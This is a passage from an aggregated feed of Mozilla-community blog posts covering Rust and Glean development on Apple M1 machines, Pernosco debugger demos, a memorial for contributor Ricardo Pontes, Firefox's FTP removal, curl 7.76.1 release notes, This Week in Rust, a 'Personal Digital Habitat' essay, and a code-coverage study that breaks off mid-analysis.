  • Build & test the Kotlin & Swift language bindings on an M1 machine, even if non-native (e.g. Rosetta 2 emulation for x86_64)
  • Build & test the Swift language bindings natively and in the iPhone simulator on an M1 machine
  • Stretch goal: Get iOS projects using Glean running as well

Rust on an M1

Work on getting Rust compiled on M1 hardware started last year in June already, with the availability of the first developer kits. See Rust issue 73908 for all the work and details. First and foremost this required a new target: aarch64-apple-darwin. This landed in August and was promoted to Tier 21 with the December release of Rust 1.49.0.

By the time I got my MacBook compiling Rust code on it was as easy as on an Intel MacBook. Developers on Intel MacBooks can cross-compile just as easily:

rustup target add aarch64-apple-darwin
cargo build --target aarch64-apple-darwin

Glean Python & Kotlin on an M1

Glean Python just … worked. We use cffi to load the native library into Python. It gained aarch642 macOS support in v14.4.1. My colleague glandium later contributed support code so we build release wheels for that target too. So it’s both possible to develop & test Glean Python, as well as use it as a dependency without having a full Rust development environment around.

Glean Android is not that straight forward. Some of our transitive dependencies are based on years-old pre-built binaries of SQLite and of course there’s not much support behind updating those Java libraries. It’s possible. A friend managed to compile and run that library on an M1. But for Glean development we simply recommend relying on Rosetta 2 (the x86_64 compatibility layer) for now. It’s as easy as:

arch -x86_64 $SHELL
make build-kotlin

At least if you have Java set up correctly… The default Android emulator isn’t usable on M1 hardware yet, but Google is working on a compatible one: Android M1 emulator preview. It’s usable enough for some testing, but for that part I most often switch back to my Linux Desktop (that has the additional CPU power on top).

Glean iOS on an M1

Now we’re getting to the interesting part: Native iOS development on an M1. Obviously for Apple this is a priority: Their new machines should become the main machine people do iOS development on. Thus Xcode gained aarch64 support in version 12 long before the hardware was available. That caused quite some issues with existing tooling, such as the dependency manager Carthage. Here’s the issue:

  • When compiling for iOS hardware you would pick a target named aarch64-apple-ios, because … iPhones and iPads are ARM-based since forever.
  • When compiling for the iOS simulator you would pick a target named x86_64-apple-ios, because conveniently the simulator uses the host’s CPU (that’s what makes it fast)

So when the compiler saw x86_64 and iOS it knew “Ah, simulator target” and when it saw aarch64 and ios it knew “Ah, hardware”. And everyone went with this, Xcode happily built both targets and, if asked to, was able to bundle them into one package.

With the introduction of Apple Silicion3 the iOS simulator run on these machines would also be aarch644, and also contain ios, but not be for the iOS hardware.

Now Xcode and the compiler will get confused what to put where when building on M1 hardware for both iOS hardware and the host architecture.

So the compiler toolchain gained knowledge of a new thing: arm64-apple-ios14.0-simulator, explicitly marking the simulator target. The compiler knows from where to pick the libraries and other SDK files when using that target. You still can’t put code compiled for arm64-apple-ios and arm64-apple-ios14.0-simulator into the same universal binary5, because you can have each architecture only once (the arm64 part in there). That’s what Carthage and others stumbled over.

Again Apple prepared for that and for a long time they have wanted you to use XCFramework bundles6. Carthage just didn’t used to support that. The 0.37.0 release fixed that.

That still leaves Rust behind, as it doesn’t know the new -simulator target. But as always the Rust community is ahead of the game and deg4uss3r started adding a new target in Rust PR #81966. He got half way there when I jumped in to push it over the finish line. How these targets work and how LLVM picks the right things to put into the compiled artifacts is severly underdocumented, so I had to go the trial-and-error route in combination with looking at LLVM source code to find the missing pieces. Turns out: the 14.0 in arm64-apple-ios14.0-simulator is actually important.

With the last missing piece in place, the new Rust target landed in February and is available in Nightly. Contrary to the main aarch64-apple-darwin or aarch64-apple-ios target, the simulator target is not Tier 2 yet and thus no prebuilt support is available. rustup target add aarch64-apple-darwin does not work right now. I am now in discussions to promote it to Tier 2, but it’s currently blocked by the RFC: Target Tier Policy.

It works on nightly however and in combination with another cargo capability I’m able to build libraries for the M1 iOS simulator:

cargo +nightly build -Z build-std --target aarch64-apple-ios-sim

For now Glean iOS development on an M1 is possible, but requires Nightly. Goal achieved, I can actually work with this!

In a future blog post I want to explain in more detail how to teach Xcode about all the different targets it should build native code for.

All The Other Projects

This was marked a stretch goal for a reason. This involves all the other teams with Rust code and the iOS teams too. We’re not there yet and there’s currently no explicit priority to make development of Firefox iOS on M1 hardware possible. But when it comes to it, Glean will be ready for it and the team can assist others to get it over the finish line.

Want to hear more about Glean and our cross-platform Rust development? Come to next week’s Rust Linz meetup, where I will be talking about this.


  1. See Platform Support for what the Tiers means.↩︎
  2. The other name for that target.↩︎
  3. “Apple Silicon” is yet another name for what is essentially the same as “M1” or “macOS aarch64”↩︎
  4. Or arm64 for that matter. Yes, yet another name for the same thing.↩︎
  5. “Universal Binaries” have existed for a long time now and allow for one binary to include the compiled artifacts for multiple targets. It’s how there’s only one Firefox for Mac download which runs natively on either Mac platform.↩︎
  6. Yup, the main documentation they link to is a WWDC 2019 talk recording video.↩︎

Robert O'CallahanDemoing The Pernosco Omniscient Debugger: Debugging Crashes In Node.js And GDB

This post was written by Pernosco co-founder Kyle Huey.

Traditional debugging forms a hypothesis about what is going wrong with the program, gathers evidence to accept or reject that hypothesis, and repeats until the root cause of the bug is found. This process is time-consuming, and formulating useful hypotheses often requires deep understanding of the software being debugged. With the Pernosco omniscient debugger there’s no need to speculate about what might have happened, instead an engineer can ask what actually did happen. This radically simplifies the debugging process, enabling much faster progress while requiring much less domain expertise.

To demonstrate the power of this approach we have two examples from well-known and complex software projects. The first is an intermittently crashing node.js test. From a simple stack walk it is easy to see that the proximate cause of the crash is calling a member function with a NULL `this` pointer. The next logical step is to determine why that pointer is NULL. In a traditional debugging approach, this requires pre-existing familiarity with the codebase, or reading code and looking for places where the value of this pointer could originate from. Then an experiment, either poking around in an interactive debugger or adding relevant logging statements, must be run to see where the NULL pointer originates from. And because this test fails intermittently, the engineer has to hope that the issue can be reproduced again and that this experiment doesn’t disturb the program’s behavior so much that the bug vanishes.

In the Pernosco omniscient debugger, the engineer just has to click on the NULL value. With all program state available at all points in time, the Pernosco omniscient debugger can track this value back to its logical origin with no guesswork on the part of the user. We are immediately taken backwards to the point where the connection in question received an EOF and set this pointer to NULL. You can read the full debugging transcript here.

Similarly, with a crash in gdb, the proximate cause of the crash is immediately obvious from a stack walk: the program has jumped through a bad vtable pointer to NULL. Figuring out why the vtable address has been corrupted is not trivial with traditional methods: there are entire tools such as ASAN (which requires recompilation) or Valgrind (which is very slow) that have been designed to find and diagnose memory corruption bugs like this. But in the Pernosco omniscient debugger a click on the object’s pointer takes the user to where it was assigned into the global variable of interest, and another click on the value of the vtable pointer takes the user to where the vtable pointer was erroneously overwritten. Walk through the complete debugging session here.

As demonstrated in the examples above, the Pernosco omniscient debugger makes it easy to track down even classes of bugs that are notoriously difficult to work with such as race conditions or memory corruption errors. Try out Pernosco individual accounts or on-premises today!

About:CommunityIn loving memory of Ricardo Pontes

It brings us great sadness to share the news that a beloved Brazilian community member and Rep alumnus, Ricardo Pontes has recently passed away.

Ricardo was one of the first Brazilian community members, contributing for more than 10 years, a good friend, and a mentor to other volunteers.

His work was instrumental on the Firefox OS days and his passion inspiring. His passing is finding us sadden and shocked. Our condolences to his family and friends.

Below are some words about Ricardo from fellow Mozillians (old and new)

  • Sérgio Oliveira (seocam): Everybody that knew Ricardo, or Pontes as we usually called him in the Mozilla community,  knows that he had a strong personality (despite his actual height). We always stood for what he believed was right and fought for it, but always smiling, making jokes and playing around with the situations. It was a real fun partner with him in many situations, even the not so easy. We are lucky to have photos of Ricardo, since he was always behind the camera taking pictures of us, and always great pictures. Pontes, it was a great pleasure to defend the free Web side-by-side with you. I’ll miss you my friend.
  • Felipe Gomes: O Ricardo sempre foi uma pessoa alegre, animada, e que tinha o dom de unir todos os grupos. Até em sua luta foi possível ver como as pessoas se uniram para rezar por ele e o quanto ele era querido para seus amigos e familiares. As memórias que temos dele são as memórias que ele registrou de nós através de sua câmera. Descanse em paz meu amigo.
  • Andrea Balle:  Pontes is and always will be part of Mozilla Brazil. One of the first members, the “jurassic team” as we called. Pontes was a generous, intelligent and high-spirited friend. I will always remeber him as a person with great enthusiasm for sharing the things that he loved, including bikes, photography, technology and the free web. He will be deeply missed.
  • Armando Neto: I met Ricardo 10 years ago, in a hotel hallway, we were chatting about something I don’t remember, but I do remember we’re laughing, and I will always remember him that way in that hallway.. laughing.
  • Luciana Viana: O Ricardo era quieto e calado, mas observava tudo e estava sempre atento aos movimentos. Nos conhecemos graças a Mozilla e tivemos a oportunidade de conviver graças às nossas inúmeras viagens juntos: Buenos Aires, Cartagena, Barcelona, Toronto, viagens inesquecíveis graças a sua presença, contribuições e senso de humor. Descance em paz querido Chuck. Peço a Deus que conforte o coração da família.
  • Clauber Stipkovic: Thank you for everything, my friend. For all the laughter, for all the late nights we spent talking about mozilla, about life and what we expected from the future. Thank you for being our photographer and recording so many cool moments, that we spent together. Unfortunately your future was very short, but I am sure that you recorded your name in the history of everything you did. May your passage be smooth and peaceful.
  • Luigui Delyer (luiguild): Ricardo was present in the best days I have ever had in my life as Mozillian, he taught me a lot, we enjoyed a lot, we travel a lot, we teach a lot, his legacy is inevitable, his name will be forever in Mozilla’s history and in our hearts. May the family feel embraced by the entire world community that he helped to build.
  • Fabricio Zuardi: As lembranças que tenho do Ricardo são todas de uma pessoa sorrindo, alegre e com alto astral. Nos deu ótimos registros de momentos felizes. Desejo conforto aos familiares e amigos, foi uma pessoa especial.
  • Guilermo Movia: I don’t remember when was the first time that I met Ricardo, but there were so many meetings and travels where our paths crossed. I remember him coming to Mar del Plata to help us talking pictures with ” De todos, para todos”  campaign. His pictures were always great, and show the best of the community. Hope you can rest in peace
  • Rosana Ardila: Ricardo was part of the soul of the Mozilla Brazil community, he was a kind and wonderful human being. It was humbling to see his commitment to the Mozilla Community. He’ll be deeply missed
  • Andre Garzia: Ricardo has been a friend and my Reps mentor for many years, it was through him and others that I discovered the joys of volunteering in a community. His example, wit, and smile, were always part of what made our community great. Ricardo has been an inspiring figure for me, not only because the love of the web that ties us all here but because he followed his passions and showed me that it was possible to pursue a career in what we loved. He loved photography, biking, and punk music, and that is how I chose to remember him. I’ll always cherish the memories we had travelling the world and exchanging stories. My heart and thoughts go to his beloved partner and family. I’ll miss you a lot my friend.
  • Lenno Azevedo: Ricardo foi o meu segundo mentor no programa Mozilla Reps, no qual me guiou dentro do projeto, me ensinando o caminho das pedras que ajudou a me tornar um bom Reps. Vou guarda pra sempre os ensinamentos e incentivos que me deu ao longo dos anos, principalmente na minha atual profissão. Te devo uma companheiro. Obrigado por tudo, descance em paz!
  • Reuben Morais: Ricardo was a beautiful soul, full of energy and smiles. Meeting him at events was always an inspiring opportunity. His energy always made every gathering feel like we all knew each other as childhood friends, I remember feeling this even when I was new. He’ll be missed by all who crossed paths with him.
  • Rubén Martín (nukeador): Ricardo was key to support the Mozilla community in Brazil, as a creative mind he was always behind his camera trying to capture and communicate what was going on, his work will remember him online. A great memory comes to my mind about the time we shared back in 2013 presenting Firefox OS to the world from Barcelona’s Mobile World Congress. You will be deeply missed, all my condolences to his family and close friends. Obrigado por tudo, descanse em paz!
  • Pierros Papadeas: A creative and kind soul, Ricardo will be surely missed by the communities he engaged so passionately.
  • Gloria Meneses: Taking amazing photos, skating and supporting his local community. A very active mozillian who loved parties after long working Reps sessions and a beer lover, that’s how I remember Ricardo. The most special memories I have from Ricardo are In Cartagena at Firefox OS event, in Barcelona at Mobile world congress taking photos, in Madrid at Reps meetings and in the IRC channel supporting Mozilla Brazil. I still can’t believe it. Rest in peace Ricardo.
  • William Quiviger: I remember Ricardo being very soft spoken and gently but fiercely passionate about Mozilla and our mission. I remember his eyes lighting up when I approached him about joining the Reps program. Rest in peace Ricardo.
  • Fernando García (stripTM): I am very shocked by this news. It is so sad and so unfair.
  • Mário Rinaldi: Ricardo era uma pessoa alegre e jovial, fará muita falta neste mundo.
  • Lourdes Castillo:  I will always remember Ricardo as a friend and brother who has always been dedicated to the Mozilla community. A tremendous person with a big heart. A hug to heaven and we will always remember you as a tremendous Mozillian and brother! Rest in peace my mozfriend
  • Luis Sánchez (lasr21) – The legacy of Ricardo’s passions will live throughout the hundreds of new contributors that his work reach.
  • Miguel Useche: Ricardo was one of the first mozillian I met outside my country. It was interesting to know someone that volunteered on Mozilla, did photography and loved to do skateboarding, just like me! I became a fan of his art and loved the few time I had the opportunity to share with him. Rest in peace bro!
  • Antonio Ladeia – Ricardo was a special guy, always happy and willing to help. I was presented with the pleasure of meeting him. His death will make this world a little sadder.
  • Eduardo Urcullú (Urcu): Ricardo o mejor conocido como “O Pontes” realmente fue un amigo muy divertido, aunque callado si cuando aún no lo conoces bien. Lo conocí en un evento de software libre allá por el año 2010 (cuando aún tenia el cabello largo xD), realmente las fotos quebtomaba con su cámara y su humor situacional son cosas para recordarlo. R.I.P. Pontes
  • Dave Villacreses (DaveEcu) Ricardo was part of the early group of supporters here in Latin America, he contributed to breathing lofe to our beloved Latam community. I remember he loved photography and was full of ideas and interesting comments to make every time. Smart and proactive. It is a really sad moment for our entire community.
  • Arturo Martinez: I met Ricardo during the MozCamp LATAM, and since then we became good friends, our paths crossed several times during events, flights, even at the MWC, he was an amazing Mozillian, always making us laugh, taking impressive pictures, with a willpower to defend what he believed, with few words but lots of passion, please rest in peace my friend.
  • Adriano Cupello:  The first time we met, we were in Cartagena for the launch of Firefox OS and I met one of the most amazing group of people of my life.  Pontes was one of them and very quickly became an “old friend” like the ones we have known at school all our lives.  He was an incredible and strong character and a great photographer.  Also he was my mentor at Mozilla reps program. The last time we talked, we tried to have a beer, but due to the circumstances of work, we were unable to.  We schedule it for the next time, and this time never came.  This week I will have this beer thinking about him.  I would like to invite all of you in the next beer that you have with your friends or alone, to dedicate this one to his memory and to the great moments we spent together with him.  My condolences and my prayers to the family and his partner @cahcontri who fought a very painful battle to report his situation until the last day with all his love.  Thank you for all lovely memories you left in my mind! We will miss you a lot! Cheers Pontes!
  • Rodrigo Padula: There were so many events, beers, good conversations and so many jokes and laughs that I don’t even remember when I met Ricardo. We shared the same sense of humor and bad jokes. Surely only good memories will remain! Rest in peace Ricado, we will miss you! 
  • Brian King: I was fortunate to have met Ricardo several times. Although quiet, you felt his presence and he was a very cool guy. We’ll miss you, I hope you get that big photo in the sky. RIP Ricardo.

Some pictures of Ricardo’s life as a Mozilla contributor can be found here

Mozilla Addons BlogBuilt-in FTP implementation to be removed in Firefox 90

Last year, the Firefox platform development team announced plans to remove the built-in FTP implementation from the browser. FTP is a protocol for transferring files from one host to another.

The implementation is currently disabled in the Firefox Nightly and Beta pre-release channels and will be disabled when Firefox 88 is released on April 19, 2021. The implementation will be removed in Firefox 90.  After FTP is disabled in Firefox, the browser will delegate ftp:// links to external applications in the same manner as other protocol handlers.

With the deprecation, browserSettings.ftpProtocolEnabled will become read-only. Attempts to set this value will have no effect.

Most places where an extension may pass “ftp” such as filters for proxy or webRequest should not result in an error, but the APIs will no longer handle requests of those types.

To help offset this removal, ftp  has been added to the list of supported protocol_handlers for browser extensions. This means that extensions will be able to prompt users to launch a FTP application to handle certain links.

Please let us if you have any questions on our developer community forum.

The post Built-in FTP implementation to be removed in Firefox 90 appeared first on Mozilla Add-ons Blog.

Ryan HarterOpportunity Sizing: Is the Juice Worth the Squeeze?

My peers at Mozilla are running workshops on opportunity sizing. If you're unfamiliar, opportunity sizing is when you take some broad guesses at how impactful some new project might be before writing any code. This gives you a rough estimate of what the upside for this work might be.

The …

Alex GibsonMy eighth year working at Mozilla

What will 2020 bring? Your guess is as good as mine. My hope is it can only get better from here.

Fucking. Hell.

Well, that was the most short sighted and optimistic take ever, eh? It feels like a decade since I wrote that, and a world away from where we all stand today. I would normally write a post on this day to talk about some of the work that I’ve been doing at Mozilla over the past 12 months, but that seems kinda insignificant right now. The global pandemic has hit the world hard, and while we’re starting to slowly to recover, it’s going to be a long process. Many businesses world wide, including Mozilla, felt the direct impact of the pandemic. I count myself fortunate to still have a stable job, and to be able to look after my family during this time. We’re all still healthy, and that’s all that really matters right now.

One thing that’s kept me going over the past year is seeing just how much people can come together to help and support each other. Family, friends, colleagues, management at work - have all been amazing. And as difficult as my kids have found the last 12 months, it motivates me to see them continue to bring enthusiasm to the world. No matter what’s happening that day, they can always cheer me up.

So I’m going to leave this short and just say stay safe. It’s going to be a truly global effort to get through this. Afterward, I’m sure there will likely be a new definition of “normal”. But I have hope that we are going to get there.

Allen Wirfs-BrockPersonal Digital Habitats

In early 2013 I wrote the blog post Ambient Computing Challenge: Please Abstract My Digital Life. In it I lamented about the inessential complexity we all encounter living with a multitude of weakly integrated digital devices and services:

I simply want to think about all my “digital stuff” as things that are always there and always available.  No matter where I am or which device I’m using.

… My attention should always be on “my stuff.”  Different devices and different services should fade into the background.

In the eight years since I wrote that blog post not much has changed in how we think about and use our various devices. Each device is still a world unto itself. Sure, there are cloud applications and services that provide support for coordinating some of “my stuff” among devices. Collaborative applications and sync services are more common and more powerful—particularly if you restrict yourself to using devices from a single company’s ecosystem. But my various devices and their idiosyncratic differences have not “faded into the background.”

Why haven’t we done better? A big reason is conceptual inertia. It’s relatively easy for software developers to imagine and implement incremental improvement to the status quo. But before developers can create a new innovative system (or users can ask for one) they have to be able to envision it and have a vocabulary for talking about it. So, I’m going to coin a term, Personal Digital Habitat, for an alternative conceptual model for how we could integrate our personal digital devices. For now, I’ll abbreviate it as PDH because each for the individual words are important. However, if it catches on I suspect we will just say habitat, digihab, or just hab.

A Personal Digital Habitat is a federated multi-device information environment within which a person routinely dwells. It is associated with a personal identity and encompasses all the digital artifacts (information, data, applications, etc.) that the person owns or routinely accesses. A PDH overlays all of a person’s devices1 and they will generally think about their digital artifacts in terms of common abstractions supported by the PDH rather than device- or silo-specific abstractions. But presentation and interaction techniques may vary to accommodate the physical characteristics of individual devices.

People will think of their PDH as the storage location of their data and other digital artifacts. They should not have to think about where among their devices the artifacts are physically stored. A PDH is responsible for making sure that artifacts are available from each of its federated devices when needed. As a digital repository, a PDH should be a “local-first software” system, meaning that it conforms to:

… a set of principles for software that enables both collaboration and ownership for users. Local-first ideals include the ability to work offline and collaborate across multiple devices, while also improving the security, privacy, long-term preservation, and user control of data.

Martin Kleppmann, Adam Wiggins, Peter van Hardenberg, and Mark McGranaghan. Local-first software: you own your data, in spite of the cloud. 2019 ACM SIGPLAN International Symposium on New Ideas, New Paradigms, and Reflections on Programming and Software (Onward!), October 2019, pages 154–178. doi:10.1145/3359591.3359737

There is one important difference between my concept of a PDH and what Kieppmann, et al describe. They talk about the need to “synchronize” a user’s data that may be stored on multiple devices and this will certainly be a fundamental (and hopefully transparent) service provided by a PDH. But they also talk at length about multi-user collaboration where simultaneous editing may occur. With every person having their own PDH, support for inter-PDH collaborative editing will certainly be important. But I think focusing on multi-user collaboration is a distraction from the personal nature of a PDH. The design of a PDH should optimize for intra-PDH activities. At any point in time, a person’s attention is generally focused on one thing. We will rarely make simultaneous edits to a single digital artifact from multiple devices federated into our PDHs. But we will rapidly shift our attention (and our editing behaviors) among our devices. Tracking intra-PDH attention shifts is likely to be useful for intra-PDH data synchronization. I’m intrigued with understanding how we might use explicit attention shifts such as touching a keyboard or picking up a tablet as clues about user intent.

So let’s make this all a little more concrete by stepping through a usage scenario. Assume that I’m sitting at my desk, in front of a large display2. Also sitting on the desk is a laptop, a tablet with a stylus, and a “phone” is in my pocket. These devices are all federated parts of my PDH. Among other things, this means that I have access to the same artifacts from all the devices and that I can frictionlessly switch among them.

  1. Initially, I’m typing formatted text into an essay that is visible on the desktop display.
  2. I pick up the tablet. The draft essay with the text I just typed is visible.
  3. I use the stylus to drag apart two paragraphs creating a drawing area and then make a quick block diagram. As I draw on the tablet, the desktop display also updates with the diagram.
  4. As I look at my drawing in context, I notice a repeated word in the preceding paragraph so I use a scratch-out gesture to delete the extra word. That word disappears from the desktop display.
  5. I put down the tablet, shift my attention back to the large display, and use a mouse and keyboard to select items in the diagram and type labels for them. If I glance at the tablet, I will see the labels.
  6. Shifting back to tablet, I use the stylus to add a couple of missing lines to the diagram.
  7. Suddenly, the desk top speaker announces, “Time to walk to the bus stop, meeting with Erik at Starbucks in 30 minutes.” The announcement might have come from any of the devices, the PDH software is aware of the proximity of my devices and makes sure only one speaks the alert.
  8. I put the laptop into my bag, check that I have my phone, and head to the bus stop.
  9. I walk fast and when I get to the bus stop I see on my phone that the bus won’t arrive for 5 minutes.
  10. From the PDH recent activities list on the phone I open the draft essay and reread what I recently wrote and attach a voice note to one of the paragraphs.
  11. Latter, after the meeting, I stay at Starbucks for a while and use the laptop to continue working on my essay following the suggestions in the voice notes I made at the bus stop.
  12. …and life goes on in my Personal Digital Habitat…

Personal Digital Habitat is an aspirational metaphor. Such metaphors have had an important role in the evolution of our computing systems. In the 1980s and 90s it was the metaphor of a virtual desktop with direct manipulation of icons corresponding to metaphorical digital artifacts that made personal computers usable by a majority of humanity. Since then we added additional metaphors such as clouds, webs, and stores that sell apps. But our systems still primarily work in terms of one person using one physical “computer” at a time—even though many of us, in a given day, frequently switch our attention among multiple computers. Personal Digital Habitat is a metaphor that can help us imagine how to unify all our computer-based personal devices and simplify our digital lives.

This essay was inspired by a twitter thread from March 22, 2021. The thread includes discussion of some technical aspects PDHs. Future blog posts may talk about the technology and how we might go about creating them.

1    The person’s general purpose computer-like devices, not the hundreds of special purpose devices such as “smart” light switches or appliances in the surrounding ambient computing environment. A PDH may mediate a person’s interaction with such ambient devices but such devices are not a federated part of the PDH. Should a smart watch be federated into a PDH? Yes, usually. How about a heart pacemaker? NO!
2    Possibly hardwired to a “desktop” computer.

Daniel Stenbergcurl 7.76.1 – h2 works again

I’m happy to once again present a new curl release to the world. This time we decided to cut the release cycle short and do a quick patch release only two weeks since the previous release. The primary reason was the rather annoying and embarrassing HTTP/2 bug. See below for all the details.

Release presentation


the 199th release
0 changes
14 days (total: 8,426)

21 bug-fixes (total: 6,833)
30 commits (total: 27,008)
0 new public libcurl function (total: 85)
0 new curl_easy_setopt() option (total: 288)

0 new curl command line option (total: 240)
23 contributors, 10 new (total: 2,366)
14 authors, 6 new (total: 878)
0 security fixes (total: 100)
0 USD paid in Bug Bounties (total: 5,200 USD)


This was a very short cycle but we still managed to merge a few interesting fixes. Here are some:

HTTP/2 selection over HTTPS

This regression is the main reason for this patch release. I fixed an issue before 7.76.0 was released and due to lack of covering tests with other TLS backends, nobody noticed that my fix also break HTTP/2 selection over HTTPS when curl was built to use one GnuTLS, BearSSL, mbedTLS, NSS, SChannnel, Secure Transport or wolfSSL!

The problem I fixed for 7.76.0: I made sure that no internal code updates the HTTP version choice the user sets, but that it then updates only the internal “we want this version”. Without this fix, an application that reuses an easy handle could without specifically asking for it, get another HTTP version in subsequent requests if a previous transfer had been downgraded. Clearly the fix was only partial.

The new fix should make HTTP/2 work and make sure the “wanted version” is used correctly. Fingers crossed!

Progress meter final update in parallel mode

When doing small and quick transfers in parallel mode with the command line tool, the logic could make the last update call to get skipped!

file: support getting directories again

Another regression. A recent fix made curl not consider directories over FILE:// to show a size (if -I or -i is used). That did however also completely break “getting” such a directory…

HTTP proxy: only loop on 407 + close if we have credentials

When a HTTP(S) proxy returns a 407 response and closes the connection, curl would retry the request to it even if it had no credentials to use. If the proxy just consistently did the same 407 + close, curl would get stuck in a retry loop…

The fixed version now only retries the connection (with auth) if curl actually has credentials to use!

Next release cycle

The plan is to make the next cycle two weeks shorter, to get us back on the previously scheduled path. This means that if we open the feature window on Monday, it will be open for just a little over two weeks, then give us three weeks of only bug-fixes before we ship the next release on May 26.

The next one is expected to become 7.77.0. Due to the rather short feature window this coming cycle I also fear that we might not be able to merge all the new features that are waiting to get merged.

Robert O'CallahanVisualizing Control Flow In Pernosco

In traditional debuggers, developers often single-step through the execution of a function to discover its control flow. One of Pernosco's main themes is avoiding single-stepping by visualizing state over time "all at once". Therefore, presenting control flow through a function "at a glance" is an important Pernosco feature and we've recently made significant improvements in this area.

This is a surprisingly hard problem. Pernosco records control flow at the instruction level. Compiler-generated debuginfo maps instructions to source lines, but lacks other potentially useful information such as the static control flow graph. We think developers want to understand control flow in the context of their source code (so approaches taken by, e.g., reverse engineering tools are not optimal for Pernosco). However, mapping potentially complex control flow onto the simple top-to-bottom source code view is inherently lossy or confusing or both.

For functions without loops there is a simple, obvious and good solution: highlight the lines executed, and let the user jump in time to that line's execution when clicked on. In the example below, we can see immediately where the function took an early exit.

To handle loops, Pernosco builds a dynamic control flow graph, which is actually a tree where leaf nodes are the execution of source lines, non-leaf nodes are the execution of a loop iteration and the root node is the execution of the function itself. Constructing a dynamic CFG is surprisingly non-trivial (especially in the presence of optimized code and large functions with long executions), but outside the scope of this post. Then, given a "current moment" during the function call, we identify which loop iterations are "current", and highlight the lines executed by those loop iterations; clicking on these highlights jumps directly to the appropriate point in time. Any lines executed during this function call but not in a current loop iteration are highlighted differently; clicking on these highlights shows all executions of that line in that function call. Hover text explains what is going on.

This presentation is still lossy — for example control-flow edges are not visible. However, user feedback has been very positive.

Try out Pernosco individual accounts or on-premises today!

This Week In RustThis Week in Rust 386

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

No papers/research projects this week.

Project/Tooling Updates
Rust Walkthroughs

Crate of the Week

This week's crate is dipa, a crate to derive delta-encoding for Rust data structures.

Despite a lack of nominations, llogiq is very pleased with his choice.

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

329 pull requests were merged in the last week

Rust Compiler Performance Triage

A very quiet week overall.

Triage done by @simulacrum. Revision range: d322385..5258a74

1 Regressions, 0 Improvements, 0 Mixed

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

Tracking Issues & PRs

New RFCs

Upcoming Events

North America
Asia Pacific

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs



Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

What I actually value on a daily basis in [rust is] I can call code written by other people without unpleasant surprises.

async fn verify_signature(token: &Jwt) -> Result<Claims, VerificationError>

Looking at a code snippet:

  • I know my JWT token won't be mutated, just accessed ( & );
  • I know the function will probably perform some kind of I/O ( async );
  • I know that the function might fail ( Result );
  • I know its failure modes ( VerificationError ).

Luca Palmieri on Twitter

Thanks to Nixon Enraght-Moony for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Marco CastelluccioOn code coverage and regressions

There are two schools of thought when it comes to code coverage: those who think it is a useless metric and those who think the opposite (OK, I’m a bit exaggerating, there are people in the middle…).

I belong to the second “school”: I have always thought, intuitively, that patches without tests are more likely to cause postrelease regressions, and so having test coverage decreases risk.

A few days ago, I set out to confirm this intuition, and I found this interesting study: Code Coverage and Postrelease Defects: A Large-Scale Study on Open Source Projects.

The authors showed (on projects that are very different from Firefox, but still…) that there was no correlation between project coverage and the amount of bugs that are introduced in the project and, more importantly, there was no correlation between file coverage and the amount of bugs that are introduced in the file.

File coverage vs Patch coverage

So, it seemed to show coverage is not a good predictor at all. I thought though: we are not as interested in existing bugs as we are interested in not introducing new ones. The study showed a file with high coverage has a similar possibility of having bugs than a file with low coverage, but… What happens if we look at things at the patch level?

Maybe those files are covered just incidentally (because their functions are called while running tests for other related files), but the tests were not specifically designed for them.

Maybe the tests were written hastily when those files got introduced, and so they are already full of bugs.

What about if we look instead at whether there is a correlation between patch coverage and the number of regressions that are introduced by those patches?

Of course, correlation is not causation, but we can at least make the case that, when new code is not automatically tested, we should be more careful and review it in more detail, or increase manual testing, or delay it to a new release to get more beta testing.

Data collection

Over the past few years, we have been collecting coverage data about Firefox patches.

It is not fully complete, as it doesn’t include Mac, it doesn’t include all possible Firefox configurations (e.g. Fission) and some languages like Python, but it does include the languages we use the most (JavaScript, C/C++, Rust), and it includes Linux and Windows (considering that a lot of Firefox code is cross-platform, I don’t see the missing Mac as a big limitation).

This means that we excluded the portions of the patches that touch Mac-specific code, Python code, etc., from the analysis.

I collected the data using bugbug and set out to explore it. I got 10938 clean patches, and 2212 buggy ones.

Box plots of bug-introducing vs clean patch code coverage

First, I plotted the data using a box plot:

Box plots of the code coverage for bug-introducing vs clean patches <figcaption>Figure 1: Box plots of the code coverage for bug-introducing vs clean patches.</figcaption>

It doesn’t tell me much. The median is higher in the case of “clean” patches though (~92% vs ~87%).

Scatter plot of lines added/covered by bug-introducing vs clean patches

Then, I plotted a scatter plot with “added lines” as the x-axis, “covered lines” as the y-axis, and color being “clean” or “buggy”. What I expected to find: more “clean” patches than “buggy” ones close to the line f(added) = covered (that is, covered == added).

Scatter plot of lines added/covered by bug-introducing vs clean patches <figcaption>Figure 2: Scatter plot of lines added/covered by bug-introducing vs clean patches.</figcaption>

There are a lot of outliers, so let’s zoom in a bit:

Zoomed scatter plot of lines added/covered by bug-introducing vs clean patches <figcaption>Figure 3: Zoomed scatter plot of lines added/covered by bug-introducing vs clean patches.</figcaption>

It seems to partly match what I expected, but… hard to tell really.

Distributions of bug-introducing vs clean patch coverage

Next step, plotting two empirical distribution functions for the two distributions. These functions show the proportion of patches, in the two distributions, at or above a given level of coverage (e.g. for the distribution of “clean patches”, when x is 0.8, y is 0.4, which means that 80% of clean patches have more than 40% coverage):

Distributions of bug-introducing vs clean patch coverage <figcaption>Figure 1: Distributions of bug-introducing vs clean patch coverage.</figcaption>

